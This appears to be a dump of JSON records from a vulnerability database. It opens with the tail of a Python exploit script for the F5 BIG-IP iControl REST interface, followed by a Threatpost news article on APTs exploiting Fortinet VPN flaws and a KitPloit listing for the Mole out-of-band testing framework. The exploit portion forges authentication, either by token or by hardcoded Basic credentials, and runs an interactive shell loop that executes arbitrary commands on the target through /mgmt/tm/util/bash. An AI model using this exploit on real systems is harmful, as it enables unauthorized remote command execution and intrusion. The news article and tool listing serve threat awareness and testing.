\n\"username\":\"admin\",  \n\"loginReference\":{\"link\":\"/shared/gossip\"},  \n\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"}  \n}  \nheaders = {  \n\"User-Agent\": \"hello-world\",  \n\"Content-Type\":\"application/x-www-form-urlencoded\"  \n}  \nresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)  \nif \"/mgmt/shared/authz/tokens/\" not in response.text:  \nprint('(-) Get token fail !!!')  \nprint('(*) Tested Method 2:')   \nheader_2 = {  \n'User-Agent': 'hello-world',  \n'Content-Type': 'application/json',  \n'X-F5-Auth-Token': '',  \n'Authorization': 'Basic YWRtaW46QVNhc1M='  \n}  \ndata_2 = {  \n\"command\": \"run\",   \n\"utilCmdArgs\": \"-c whoami\"  \n}  \ncheck_url = url + '/mgmt/tm/util/bash'  \ntry:  \nresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)  \nif response2.status_code == 200 and 'commandResult' in response2.text:  \nwhile True:  \ncmd = input(\"(:CMD)> \")  \ndata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)}  \nr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)  \nif r.status_code == 200 and 'commandResult' in r.text:  \nprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))  \nelse:  \nprint('(-) Not vuln...')  \nexit(0)  \nexcept Exception:  \nprint('ERROR Connect')  \nprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]))  \nwhile True:  \ncmd = input(\"(:CMD)> \")  \nheaders = {  \n\"Content-Type\": \"application/json\",  \n\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])  \n}  \ndata_json = {  \n\"command\": \"run\",   \n\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd)  \n}  \nexp_url= url + '/mgmt/tm/util/bash'  \nexp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)  \nif exp_req.status_code == 200 and 'commandResult' in exp_req.text:  \nprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', ''))  \nelse:  \nprint('(-) Not vuln...')  \nexit(0)  \n  \nif __name__ == '__main__':  \ntitle()  \nif(len(sys.argv) < 2):  \nprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0]))  \nexit(0)  \nelse:  \nexploit(sys.argv[1])  \n  \n`\n"
      }
    }
  }
}

Example link: FBI: APTs Actively Exploiting Fortinet VPN Bugs

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A": {
        "id": "THREATPOST:2DFBDDFFE3121143D95705C4EA525C7A",
        "type": "threatpost",
        "bulletinFamily": "info",
        "title": "FBI: APTs Actively Exploiting Fortinet VPN Bugs",
        "description": "The FBI and the Cybersecurity and Infrastructure Security Agency are warning that advanced persistent threat (APT) nation-state actors are actively exploiting known security vulnerabilities in the Fortinet FortiOS cybersecurity operating system, affecting the company’s SSL VPN products.\n\nAccording to an alert issued Friday by the FBI and CISA, cyberattackers are scanning devices on ports 4443, 8443 and 10443, looking for unpatched Fortinet security implementations. Specifically, APTs are exploiting CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812.\n\n“It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial and technology services networks,” according to [the alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>). “APT actors have historically exploited critical vulnerabilities to conduct distributed denial-of-service (DDoS) attacks, ransomware attacks, structured query language (SQL) injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.”\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe bug tracked as [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) is a path-traversal issue in Fortinet FortiOS, where the SSL VPN web portal allows an unauthenticated attacker to download system files via specially crafted HTTP resource requests.\n\nThe [CVE-2019-5591](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591>) flaw is a default-configuration vulnerability in FortiOS that could allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\nAnd finally, [CVE-2020-12812](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812>) is an improper-authentication vulnerability in SSL VPN in FortiOS, which could allow a user to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n“Attackers are increasingly targeting critical external applications – VPNs have been targeted even more this last year,” said Zach Hanley, senior red team engineer at Horizon3.AI, via email. “These three vulnerabilities targeting the Fortinet VPN allow an attacker to obtain valid credentials, bypass multifactor authentication (MFA), and man-in-the-middle (MITM) authentication traffic to intercept credentials.”\n\nHanley added, “The common theme here is: once they are successful, they will look just like your normal users.”\n\nThe bugs are popular with cyberattackers in general, due to Fortinet’s widespread footprint, researchers noted.\n\n“CVE-2018-13379 is a critical vulnerability in the Fortinet FortiOS SSL VPN that has been favored by cybercriminals since exploit details became public in August 2019,” Satnam Narang, staff research engineer at Tenable, said via email. “In fact, Tenable’s 2020 Threat Landscape Retrospective placed it in our Top 5 Vulnerabilities of 2020 because we see threat actors continue to leverage it in the wild, well over a year after it was first disclosed.”\n\nThe FBI and CISA didn’t specify which APTs are mounting the recent activity.\n\n## Initial Compromise &amp; Recon\n\nOnce exploited, the attackers are moving laterally and carrying out reconnaissance on targets, according to officials.\n\n“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical-infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks,” the warning explained. “APT actors may use other CVEs or common exploitation techniques—such as spear-phishing—to gain access to critical infrastructure networks to pre-position for follow-on attacks.”\n\nThe joint cybersecurity advisory from the FBI and CISA follows last year’s flurry of advisories from U.S. agencies about APT groups using unpatched vulnerabilities to target federal agencies and commercial organizations. For instance, in October [an alert went out](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) that APTs were using flaws in outdated VPN technologies from Fortinet, Palo Alto Networks and Pulse Secure to carry out cyberattacks on targets in the United States and overseas.\n\n“It’s no surprise to see additional Fortinet FortiOS vulnerabilities like CVE-2019-5591 and CVE-2020-12812 added to the list of known, but unpatched flaws being leveraged by these threat actors,” said Narang. “Over the last few years, SSL VPN vulnerabilities have been an attractive target for APT groups and cybercriminals alike. With the shift to remote work and the increased demand for SSL VPNs like Fortinet and others, the attack surface and available targets have expanded. Organizations should take this advisory seriously and prioritize patching their Fortinet devices immediately if they haven’t done so already.”\n\n## **How Can I Protect My Network from Cyberattacks? **\n\nThe FBI and CISA suggest a range of best practices to help organizations thwart these and other attacks:\n\n  * Immediately patch CVEs 2018-13379, 2020-12812 and 2019-5591.\n  * If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization’s execution-deny list. Any attempts to install or run this program and its associated files should be prevented.\n  * Regularly back up data, air-gap and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.\n  * Implement network segmentation.\n  * Require administrator credentials to install software.\n  * Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\n  * Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.\n  * Use multifactor authentication where possible.\n  * Regularly change passwords to network systems and accounts, and avoid reusing passwords for different accounts. Implement the shortest acceptable timeframe for password changes.\n  * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n  * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n  * Install and regularly update antivirus and anti-malware software on all hosts.\n  * Consider adding an email banner to emails received from outside your organization.\n  * Disable hyperlinks in received emails.\n  * Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ – unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n  * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n",
        "published": "2021-04-02T19:56:57",
        "modified": "2021-04-02T19:56:57",
        "cvss": {
          "score": 7.5,
          "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
        },
        "href": "https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/",
        "reporter": "Tara Seals",
        "references": [
          "https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios",
          "https://threatpost.com/newsletter-sign/",
          "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379",
          "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5591",
          "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12812",
          "https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/",
          "https://threatpost.com/category/webinars/",
          "https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar"
        ],
        "cvelist": [
          "CVE-2018-13379",
          "CVE-2019-5591",
          "CVE-2020-12812"
        ],
        "lastseen": "2021-04-02T20:09:09",
        "viewCount": 49,
        "enchantments": {
          "dependencies": {
            "references": [
              {
                "type": "attackerkb",
                "idList": [
                  "AKB:35B88369-C440-49C0-98FF-C50E258FB32C",
                  "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A"
                ]
              },
              {
                "type": "cve",
                "idList": [
                  "CVE-2018-13379",
                  "CVE-2020-12812",
                  "CVE-2019-5591"
                ]
              },
              {
                "type": "cisa",
                "idList": [
                  "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF"
                ]
              },
              {
                "type": "nessus",
                "idList": [
                  "MACOSX_FORTIOS_FG-IR-18-384.NASL",
                  "FORTIOS_FG-IR-19-037.NASL",
                  "FORTIOS_FG-IR-18-384.NASL",
                  "FORTIOS_FG-IR-18-384_DIRECT.NASL",
                  "FORTIOS_FG-IR-19-283.NASL"
                ]
              },
              {
                "type": "packetstorm",
                "idList": [
                  "PACKETSTORM:154147",
                  "PACKETSTORM:154146"
                ]
              },
              {
                "type": "kitploit",
                "idList": [
                  "KITPLOIT:763105754466120590",
                  "KITPLOIT:6516544912632048506",
                  "KITPLOIT:5397133847150975825",
                  "KITPLOIT:5563730483162396602",
                  "KITPLOIT:7070039119688478663",
                  "KITPLOIT:965198862441671998",
                  "KITPLOIT:816704453339226193",
                  "KITPLOIT:3532211766929466258",
                  "KITPLOIT:5376485594298165648",
                  "KITPLOIT:5829195600312197311"
                ]
              },
              {
                "type": "exploitdb",
                "idList": [
                  "EDB-ID:47288",
                  "EDB-ID:47287"
                ]
              },
              {
                "type": "zdt",
                "idList": [
                  "1337DAY-ID-33134",
                  "1337DAY-ID-33133"
                ]
              },
              {
                "type": "dsquare",
                "idList": [
                  "E-691"
                ]
              },
              {
                "type": "exploitpack",
                "idList": [
                  "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485",
                  "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5"
                ]
              },
              {
                "type": "rapid7blog",
                "idList": [
                  "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"
                ]
              },
              {
                "type": "thn",
                "idList": [
                  "THN:9994A9D5CFB76851BB74C8AD52F3DBBE"
                ]
              },
              {
                "type": "threatpost",
                "idList": [
                  "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE",
                  "THREATPOST:71C45E867DCD99278A38088B59938B48",
                  "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB"
                ]
              },
              {
                "type": "qualysblog",
                "idList": [
                  "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"
                ]
              }
            ],
            "modified": "2021-04-02T20:09:09",
            "rev": 2
          },
          "score": {
            "value": 5.3,
            "vector": "NONE",
            "modified": "2021-04-02T20:09:09",
            "rev": 2
          },
          "vulnersScore": 5.3
        }
      }
    }
  }
}

Example link: Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities

Json output:

{
  "result": "OK",
  "data": {
    "documents": {
      "KITPLOIT:5878527601774962255": {
        "id": "KITPLOIT:5878527601774962255",
        "bulletinFamily": "tools",
        "title": "Mole - A Framework For Identifying And Exploiting Out-Of-Band Application Vulnerabilities",
        "description": "[ ![](https://1.bp.blogspot.com/-G4SnmIGlQ1g/YE6MCgPm1LI/AAAAAAAAVng/_Ts1qiMQNIQ2n2PWo7PYVmpCvzYo0XjiwCNcBGAsYHQ/w640-h400/OOB.png) ](<https://1.bp.blogspot.com/-G4SnmIGlQ1g/YE6MCgPm1LI/AAAAAAAAVng/_Ts1qiMQNIQ2n2PWo7PYVmpCvzYo0XjiwCNcBGAsYHQ/s670/OOB.png>)\n\n  \n\n\nA framework for identifying and [ exploiting ](<https://www.kitploit.com/search/label/Exploiting> \"exploiting\" ) out-of-band (OOB) vulnerabilities. \n\n  \n\n\n** Installation &amp; Setup **   \n  \n** Mole Install **   \n\n\nPython &gt;= 3.6 \n\n` virtualenv -p /usr/bin/python3 venv `\n\n` source venv/bin/activate `\n\n` ./venv/bin/pip3 install -r requirements.txt `\n\n` git submodule update --init --recursive `\n\nSet an API key in ` config.yml ` (must be the same for the client and server) \n\n  \n** DNS Configuration **   \n\n\nYou'll need to configure the DNS records in your registrar to point to your mole server. Minimally, you'll need an ` A ` record for the name server and an ` NS ` record configured. \n\nMole can be configured to host other configuration options. \n\n  \n** Mailgun (Optional) **   \n\n\nMailgun requires DNS entries to enable the service: [ https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain- ](<https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-> \"https://help.mailgun.com/hc/en-us/articles/203637190-How-Do-I-Add-or-Delete-a-Domain-\" )\n\n  \n** TLS **   \n\n\nCurrently Mole does not support TLS natively. To implement TLS, use a [ reverse ](<https://www.kitploit.com/search/label/Reverse> \"reverse\" ) proxy such as [ nginx ](<https://docs.nginx.com/nginx/admin-guide/security-controls/terminating-ssl-http/> \"nginx\" ) to terminate the TLS connection and forward [ traffic ](<https://www.kitploit.com/search/label/Traffic> \"traffic\" ) to the Mole server. \n\n  \n** Burp Suite Extension **   \n\n\nThe [ Burp Suite Extension ](<https://www.kitploit.com/search/label/Burp%20Suite%20Extension> \"Burp Suite Extension\" ) requires a separate Python 2.7 virtual environment due to the latest version of Jython only supporting 2.7. Below are the instructions for setting up the virtual environment and configuring the Extension. \n\n  1. Create a new python2.7 virtualenv for burp/jython, ` virtualenv -p /usr/bin/python2.7 burp_venv `\n  2. Load the venv, ` source ./burp_venv/bin/activate `\n  3. Install the required packages, ` ./burp_venv/bin/pip -r requirements `\n  4. Configure the Python Environment by downloading and selecting the jython-standalone jar. \n  5. Set the \"Folder for loading modules\" to the full path to ` burp_venv/lib/python2.7/site-packages ` that was created in steps 1-3. \n\n[ ![](https://1.bp.blogspot.com/-53z9NzOrDJo/YE6MWNHzX2I/AAAAAAAAVnk/vjsFi57Qg9YEKk_5xmVQcnd7M4-nSpwjACNcBGAsYHQ/w640-h238/mole_1_burp_python_env.png) ](<https://1.bp.blogspot.com/-53z9NzOrDJo/YE6MWNHzX2I/AAAAAAAAVnk/vjsFi57Qg9YEKk_5xmVQcnd7M4-nSpwjACNcBGAsYHQ/s848/mole_1_burp_python_env.png>)\n\n  \n\n\n  4. Click Add \n\n[ ![](https://1.bp.blogspot.com/-uBrtnM3EiHw/YE6Ma0ftquI/AAAAAAAAVns/3ETgB3ZJkuMfH-GuIjL7MGcmdmg-9u8FQCNcBGAsYHQ/s16000/mole_2_burp_ext_add_1.png) ](<https://1.bp.blogspot.com/-uBrtnM3EiHw/YE6Ma0ftquI/AAAAAAAAVns/3ETgB3ZJkuMfH-GuIjL7MGcmdmg-9u8FQCNcBGAsYHQ/s340/mole_2_burp_ext_add_1.png>)\n\n  \n\n\n  5. Set the Extension type to ` Python ` and select the ` mole_burp_extension.py ` file from the mole project directory. \n\n[ ![](https://1.bp.blogspot.com/-di2NDO2EU64/YE6MgarjeII/AAAAAAAAVnw/28mwlrkC4ngOnDOfCxSC_qEOpY2CYWoVwCNcBGAsYHQ/w640-h198/mole_3_burp_ext_add_2.png) ](<https://1.bp.blogspot.com/-di2NDO2EU64/YE6MgarjeII/AAAAAAAAVnw/28mwlrkC4ngOnDOfCxSC_qEOpY2CYWoVwCNcBGAsYHQ/s880/mole_3_burp_ext_add_2.png>)\n\n  \n\n\n  6. Click Next and if all goes well, there will be no errors on the load screen. \n\n[ ![](https://1.bp.blogspot.com/-YRA2FrXk5Bc/YE6Mk7RCZxI/AAAAAAAAVn0/qBMtUW1YmEwOoGPcLT6zUISOJAMbjO5QACNcBGAsYHQ/w640-h168/mole_4_burp_ext_success.png) ](<https://1.bp.blogspot.com/-YRA2FrXk5Bc/YE6Mk7RCZxI/AAAAAAAAVn0/qBMtUW1YmEwOoGPcLT6zUISOJAMbjO5QACNcBGAsYHQ/s835/mole_4_burp_ext_success.png>)\n\n  \n\n\n** Configuration **   \n  \n** Token **   \n\n\n` domain ` \\- Your custom domain \n\n` length ` \\- Length of the tokens (default 5) \n\nThe token character set is ascii upper &amp; lower, and digits. The length can be modified to meet needs such as constrained space for a payload. The number of tokens per length is listed below. \n\n  * 1 - 62 \n  * 2 - 3844 \n  * 3 - 238328 \n  * 4 - 14776336 \n  * 5 - 916132832 \n\n` ssl ` \\- Configure payloads for ` https ` vs ` http `\n\n``server` - domain or IP of the Mole token server \n\n` default_tags ` \\- list of default tags to add to all tokens. Useful for per-project/client tokens. \n\n  \n** Server **   \n\n\n` api_key ` \\- API key used to authenticate requests to the mole API \n\n` dns_addr ` \\- IP address used to respond to DNS queries \n\n` db_conn ` \\- [ SQLAlchemy ](<https://www.sqlalchemy.org/> \"SQLAlchemy\" ) [ database URL ](<https://docs.sqlalchemy.org/en/13/core/engines.html> \"database URL\" ) . Default is a SQLite db in the root directory ` sqlite:///mole.db `\n\n` static_responses ` \\- list of DNS static response key/value pairs \n\n` web_port ` \\- configure the listening web port \n\n` dns_port ` -configure the listening dns port \n\n  \n** Notifications **   \n\n\nAll notifications have an ` enabled ` flag that determines whether or not to trigger the notification on an interaction. Each notification plugin has its own configuration items. \n\n` mailgun ` \\- configure ` domain ` , ` to ` , ` from ` , and ` api_key ` to enable [ mailgun ](<https://www.mailgun.com/> \"mailgun\" ) email notifications \n\n` slack ` \\- ` token ` and ` channel `\n\n` webhook ` \\- generic POST webhook \n\n  \n** Issues/Bugs **   \n\n\nI'm sure there are many, please create a new [ issue ](<https://github.com/ztgrace/mole/issues> \"issue\" ) and fill out the template as best as you can for quick triage. \n\n  \n  \n\n\n** [ Download Mole ](<https://github.com/ztgrace/mole> \"Download Mole\" ) **\n",
        "published": "2021-03-21T11:30:03",
        "modified": "2021-03-21T11:30:03",
        "cvss": {
          "score": 0.0,
          "vector": "NONE"
        },
        "href": "http://www.kitploit.com/2021/03/mole-framework-for-identifying-and.html",
        "reporter": "KitPloit",
        "references": [
          "https://github.com/ztgrace/mole/issues",
          "https://github.com/ztgrace/mole"
        ],
        "cvelist": [],
        "type": "kitploit",
        "lastseen": "2021-03-21T15:30:33",
        "edition": 1,
        "viewCount": 152,
        "enchantments": {
          "dependencies": {
            "references": [],
            "modified": "2021-03-21T15:30:33",
            "rev": 2
          },
          "score": {
            "value": -0.1,
            "vector": "NONE",
            "modified": "2021-03-21T15:30:33",
            "rev": 2
          },
          "vulnersScore": -0.1
        },
        "toolHref": "https://github.com/ztgrace/mole"
      }
    }
  }
}